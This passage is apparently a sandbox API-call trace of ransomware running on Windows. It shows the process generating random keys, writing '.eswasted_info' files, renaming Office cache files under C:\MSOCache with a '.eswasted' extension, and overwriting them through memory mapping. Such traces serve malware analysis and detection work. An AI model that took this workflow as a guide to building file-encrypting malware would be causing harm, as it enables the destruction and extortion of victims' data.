lpBuffer=0x4de9f0*, lpNumberOfBytesWritten=0x121fec4*=0xa46, lpOverlapped=0x0) returned 1 [0070.388] SetEndOfFile (hFile=0x110) returned 1 [0070.388] SetFilePointer (in: hFile=0x110, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0070.388] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4de9f0 | out: hHeap=0x4a0000) returned 1 [0070.388] lstrcpyW (in: lpString1=0x4d94aa, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0070.388] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.en\\proof.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.xml.eswasted" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.en\\proof.xml.eswasted")) returned 1 [0070.395] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.xml.eswasted" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.en\\proof.xml.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0070.395] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x11c [0070.395] GetFileSize (in: hFile=0x118, lpFileSizeHigh=0x121fe94 | out: lpFileSizeHigh=0x121fe94*=0x0) returned 0x543 [0070.395] MapViewOfFile (hFileMappingObject=0x11c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x543) returned 0x2d0000 [0070.395] CloseHandle (hObject=0x118) returned 1 [0070.400] CryptAcquireContextW (in: phProv=0x121fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fe84*=0x4c4010) returned 1 [0070.401] CryptGenRandom (in: hProv=0x4c4010, dwLen=0x1b8, pbBuffer=0x4dda58 | out: pbBuffer=0x4dda58) returned 1 [0070.401] CryptReleaseContext (hProv=0x4c4010, dwFlags=0x0) returned 1 [0070.401] CryptAcquireContextW (in: phProv=0x121fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fbec*=0x4c4010) returned 1 [0070.401] CryptGenRandom (in: hProv=0x4c4010, dwLen=0x200, pbBuffer=0x121fc08 | out: pbBuffer=0x121fc08) returned 1 [0070.401] CryptReleaseContext (hProv=0x4c4010, dwFlags=0x0) returned 1 [0070.410] SetEndOfFile (hFile=0x110) returned 1 [0070.412] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4e0410 | out: hHeap=0x4a0000) returned 1 [0070.412] CloseHandle (hObject=0x110) returned 1 [0070.413] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4d9400 | out: hHeap=0x4a0000) returned 1 [0070.413] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4dd6f0 | out: hHeap=0x4a0000) returned 1 [0070.414] _aulldvrm () returned 0x0 [0070.414] CryptAcquireContextW (in: phProv=0x121fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fecc*=0x4c4048) returned 1 [0070.414] CryptGenRandom (in: hProv=0x4c4048, dwLen=0x48, pbBuffer=0x121ff08 | out: pbBuffer=0x121ff08) returned 1 [0070.414] CryptReleaseContext (hProv=0x4c4048, dwFlags=0x0) returned 1 [0070.414] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.xml") returned 85 [0070.414] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x2b4) returned 0x4d9400 [0070.415] lstrcpyW (in: lpString1=0x4d94aa, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0070.415] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4e0410 [0070.415] CryptAcquireContextW (in: phProv=0x121fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fea8*=0x4c4048) returned 1 [0070.415] CryptGenRandom (in: hProv=0x4c4048, dwLen=0xa46, pbBuffer=0x4e0410 | out: pbBuffer=0x4e0410) returned 1 [0070.415] CryptReleaseContext (hProv=0x4c4048, dwFlags=0x0) returned 1 [0070.415] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.xml.eswasted_info" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.es\\proof.xml.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0070.416] WriteFile (in: hFile=0x110, lpBuffer=0x4e0410*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x121fec4, lpOverlapped=0x0 | out: lpBuffer=0x4e0410*, lpNumberOfBytesWritten=0x121fec4*=0xa46, lpOverlapped=0x0) returned 1 [0070.444] SetEndOfFile (hFile=0x110) returned 1 [0070.444] SetFilePointer (in: hFile=0x110, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0070.445] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4e0410 | out: hHeap=0x4a0000) returned 1 [0070.445] lstrcpyW (in: lpString1=0x4d94aa, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0070.445] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.es\\proof.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.xml.eswasted" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.es\\proof.xml.eswasted")) returned 1 [0070.449] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.xml.eswasted" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.es\\proof.xml.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0070.450] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x11c [0070.450] GetFileSize (in: hFile=0x118, lpFileSizeHigh=0x121fe94 | out: lpFileSizeHigh=0x121fe94*=0x0) returned 0x5b1 [0070.450] MapViewOfFile (hFileMappingObject=0x11c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x5b1) returned 0x2d0000 [0070.450] CloseHandle (hObject=0x118) returned 1 [0070.452] CryptAcquireContextW (in: phProv=0x121fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fe84*=0x4dd6c8) returned 1 [0070.453] CryptGenRandom (in: hProv=0x4dd6c8, dwLen=0x1b8, pbBuffer=0x4ddd68 | out: pbBuffer=0x4ddd68) returned 1 [0070.453] CryptReleaseContext (hProv=0x4dd6c8, dwFlags=0x0) returned 1 [0070.453] CryptAcquireContextW (in: phProv=0x121fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fbec*=0x4dd6c8) returned 1 [0070.454] CryptGenRandom (in: hProv=0x4dd6c8, dwLen=0x200, pbBuffer=0x121fc08 | out: pbBuffer=0x121fc08) returned 1 [0070.454] CryptReleaseContext (hProv=0x4dd6c8, dwFlags=0x0) returned 1 [0070.464] SetEndOfFile (hFile=0x110) returned 1 [0070.466] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4e0820 | out: hHeap=0x4a0000) returned 1 [0070.466] CloseHandle (hObject=0x110) returned 1 [0070.467] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4d9400 | out: hHeap=0x4a0000) returned 1 [0070.467] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4d9840 | out: hHeap=0x4a0000) returned 1 [0070.467] _aulldvrm () returned 0x0 [0070.468] CryptAcquireContextW (in: phProv=0x121fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fecc*=0x4dd6c8) returned 1 [0070.468] CryptGenRandom (in: hProv=0x4dd6c8, dwLen=0x48, pbBuffer=0x121ff08 | out: pbBuffer=0x121ff08) returned 1 [0070.468] CryptReleaseContext (hProv=0x4dd6c8, dwFlags=0x0) returned 1 [0070.468] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.xml") returned 85 [0070.468] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x2b4) returned 0x4d9400 [0070.468] lstrcpyW (in: lpString1=0x4d94aa, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0070.468] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4e0410 [0070.468] CryptAcquireContextW (in: phProv=0x121fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fea8*=0x4dd6c8) returned 1 [0070.469] CryptGenRandom (in: hProv=0x4dd6c8, dwLen=0xa46, pbBuffer=0x4e0410 | out: pbBuffer=0x4e0410) returned 1 [0070.469] CryptReleaseContext (hProv=0x4dd6c8, dwFlags=0x0) returned 1 [0070.469] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.xml.eswasted_info" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.fr\\proof.xml.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0070.470] WriteFile (in: hFile=0x110, lpBuffer=0x4e0410*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x121fec4, lpOverlapped=0x0 | out: lpBuffer=0x4e0410*, lpNumberOfBytesWritten=0x121fec4*=0xa46, lpOverlapped=0x0) returned 1 [0070.471] SetEndOfFile (hFile=0x110) returned 1 [0070.471] SetFilePointer (in: hFile=0x110, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0070.471] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4e0410 | out: hHeap=0x4a0000) returned 1 [0070.471] lstrcpyW (in: lpString1=0x4d94aa, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0070.471] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.fr\\proof.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.xml.eswasted" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.fr\\proof.xml.eswasted")) returned 1 [0070.473] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.xml.eswasted" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.fr\\proof.xml.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x11c [0070.473] CreateFileMappingW (hFile=0x11c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x118 [0070.473] GetFileSize (in: hFile=0x11c, lpFileSizeHigh=0x121fe94 | out: lpFileSizeHigh=0x121fe94*=0x0) returned 0x5b2 [0070.473] MapViewOfFile (hFileMappingObject=0x118, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x5b2) returned 0x2d0000 [0070.473] CloseHandle (hObject=0x11c) returned 1 [0070.475] CryptAcquireContextW (in: phProv=0x121fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fe84*=0x4dd690) returned 1 [0070.476] CryptGenRandom (in: hProv=0x4dd690, dwLen=0x1b8, pbBuffer=0x4d9708 | out: pbBuffer=0x4d9708) returned 1 [0070.476] CryptReleaseContext (hProv=0x4dd690, dwFlags=0x0) returned 1 [0070.476] CryptAcquireContextW (in: phProv=0x121fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fbec*=0x4dd690) returned 1 [0070.477] CryptGenRandom (in: hProv=0x4dd690, dwLen=0x200, pbBuffer=0x121fc08 | out: pbBuffer=0x121fc08) returned 1 [0070.477] CryptReleaseContext (hProv=0x4dd690, dwFlags=0x0) returned 1 [0070.486] SetEndOfFile (hFile=0x110) returned 1 [0070.488] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4e0410 | out: hHeap=0x4a0000) returned 1 [0070.488] CloseHandle (hObject=0x110) returned 1 [0070.489] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4d9400 | out: hHeap=0x4a0000) returned 1 [0070.489] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4e0308 | out: hHeap=0x4a0000) returned 1 [0070.490] _aulldvrm () returned 0x0 [0070.490] CryptAcquireContextW (in: phProv=0x121fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fecc*=0x4dd6c8) returned 1 [0070.490] CryptGenRandom (in: hProv=0x4dd6c8, dwLen=0x48, pbBuffer=0x121ff08 | out: pbBuffer=0x121ff08) returned 1 [0070.490] CryptReleaseContext (hProv=0x4dd6c8, dwFlags=0x0) returned 1 [0070.490] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml") returned 79 [0070.490] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x2a8) returned 0x4d9400 [0070.490] lstrcpyW (in: lpString1=0x4d949e, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0070.490] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4de9f0 [0070.490] CryptAcquireContextW (in: phProv=0x121fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fea8*=0x4dd6c8) returned 1 [0070.491] CryptGenRandom (in: hProv=0x4dd6c8, dwLen=0xa46, pbBuffer=0x4de9f0 | out: pbBuffer=0x4de9f0) returned 1 [0070.491] CryptReleaseContext (hProv=0x4dd6c8, dwFlags=0x0) returned 1 [0070.491] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml.eswasted_info" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proofing.xml.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0070.491] WriteFile (in: hFile=0x110, lpBuffer=0x4de9f0*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x121fec4, lpOverlapped=0x0 | out: lpBuffer=0x4de9f0*, lpNumberOfBytesWritten=0x121fec4*=0xa46, lpOverlapped=0x0) returned 1 [0070.494] SetEndOfFile (hFile=0x110) returned 1 [0070.494] SetFilePointer (in: hFile=0x110, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0070.494] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4de9f0 | out: hHeap=0x4a0000) returned 1 [0070.494] lstrcpyW (in: lpString1=0x4d949e, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0070.495] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proofing.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml.eswasted" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proofing.xml.eswasted")) returned 1 [0070.495] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml.eswasted" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proofing.xml.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x11c [0070.495] CreateFileMappingW (hFile=0x11c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x114 [0070.495] GetFileSize (in: hFile=0x11c, lpFileSizeHigh=0x121fe94 | out: lpFileSizeHigh=0x121fe94*=0x0) returned 0x32b [0070.495] MapViewOfFile (hFileMappingObject=0x114, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x32b) returned 0x2d0000 [0070.496] CloseHandle (hObject=0x11c) returned 1 [0070.499] CryptAcquireContextW (in: phProv=0x121fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fe84*=0x4e5ff0) returned 1 [0070.500] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x1b8, pbBuffer=0x4d96f8 | out: pbBuffer=0x4d96f8) returned 1 [0070.500] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0070.500] CryptAcquireContextW (in: phProv=0x121fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fbec*=0x4e5ff0) returned 1 [0070.501] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x200, pbBuffer=0x121fc08 | out: pbBuffer=0x121fc08) returned 1 [0070.501] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0070.509] SetEndOfFile (hFile=0x110) returned 1 [0070.511] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4e7fd8 | out: hHeap=0x4a0000) returned 1 [0070.511] CloseHandle (hObject=0x110) returned 1 [0070.513] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4d9400 | out: hHeap=0x4a0000) returned 1 [0070.513] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4d9948 | out: hHeap=0x4a0000) returned 1 [0070.513] _aulldvrm () returned 0x0 [0070.513] CryptAcquireContextW (in: phProv=0x121fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fecc*=0x4e5ff0) returned 1 [0070.514] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x48, pbBuffer=0x121ff08 | out: pbBuffer=0x121ff08) returned 1 [0070.514] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0070.514] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 76 [0070.514] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x2a2) returned 0x4ddd20 [0070.514] lstrcpyW (in: lpString1=0x4dddb8, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0070.514] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4e7fd8 [0070.514] CryptAcquireContextW (in: phProv=0x121fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fea8*=0x4e5ff0) returned 1 [0070.515] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0xa46, pbBuffer=0x4e7fd8 | out: pbBuffer=0x4e7fd8) returned 1 [0070.515] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0070.515] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml.eswasted_info" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\setup.xml.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0070.515] WriteFile (in: hFile=0x110, lpBuffer=0x4e7fd8*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x121fec4, lpOverlapped=0x0 | out: lpBuffer=0x4e7fd8*, lpNumberOfBytesWritten=0x121fec4*=0xa46, lpOverlapped=0x0) returned 1 [0070.516] SetEndOfFile (hFile=0x110) returned 1 [0070.516] SetFilePointer (in: hFile=0x110, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0070.516] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4e7fd8 | out: hHeap=0x4a0000) returned 1 [0070.516] lstrcpyW (in: lpString1=0x4dddb8, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0070.516] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\setup.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml.eswasted" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\setup.xml.eswasted")) returned 1 [0070.517] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml.eswasted" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\setup.xml.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x114 [0070.517] CreateFileMappingW (hFile=0x114, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x11c [0070.517] GetFileSize (in: hFile=0x114, lpFileSizeHigh=0x121fe94 | out: lpFileSizeHigh=0x121fe94*=0x0) returned 0x16fc [0070.517] MapViewOfFile (hFileMappingObject=0x11c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x16fc) returned 0x2d0000 [0070.517] CloseHandle (hObject=0x114) returned 1 [0070.521] CryptAcquireContextW (in: phProv=0x121fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fe84*=0x4e5ff0) returned 1 [0070.522] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x1b8, pbBuffer=0x4de018 | out: pbBuffer=0x4de018) returned 1 [0070.522] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0070.522] CryptAcquireContextW (in: phProv=0x121fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fbec*=0x4e5ff0) returned 1 [0070.523] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x200, pbBuffer=0x121fc08 | out: pbBuffer=0x121fc08) returned 1 [0070.523] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0070.531] SetEndOfFile (hFile=0x110) returned 1 [0070.533] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4e7fd8 | out: hHeap=0x4a0000) returned 1 [0070.533] CloseHandle (hObject=0x110) returned 1 [0070.534] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ddd20 | out: hHeap=0x4a0000) returned 1 [0070.535] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4dd498 | out: hHeap=0x4a0000) returned 1 [0070.535] _aulldvrm () returned 0x0 [0070.535] CryptAcquireContextW (in: phProv=0x121fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fecc*=0x4e5ff0) returned 1 [0070.535] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x48, pbBuffer=0x121ff08 | out: pbBuffer=0x121ff08) returned 1 [0070.535] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0070.535] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml") returned 82 [0070.535] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x2ae) returned 0x4ddd20 [0070.536] lstrcpyW (in: lpString1=0x4dddc4, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0070.536] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4e7fd8 [0070.536] CryptAcquireContextW (in: phProv=0x121fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fea8*=0x4e5ff0) returned 1 [0070.536] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0xa46, pbBuffer=0x4e7fd8 | out: pbBuffer=0x4e7fd8) returned 1 [0070.536] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0070.536] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml.eswasted_info" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\office32mui.xml.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0070.537] WriteFile (in: hFile=0x110, lpBuffer=0x4e7fd8*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x121fec4, lpOverlapped=0x0 | out: lpBuffer=0x4e7fd8*, lpNumberOfBytesWritten=0x121fec4*=0xa46, lpOverlapped=0x0) returned 1 [0070.538] SetEndOfFile (hFile=0x110) returned 1 [0070.539] SetFilePointer (in: hFile=0x110, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0070.539] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4e7fd8 | out: hHeap=0x4a0000) returned 1 [0070.539] lstrcpyW (in: lpString1=0x4dddc4, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0070.539] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\office32mui.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All 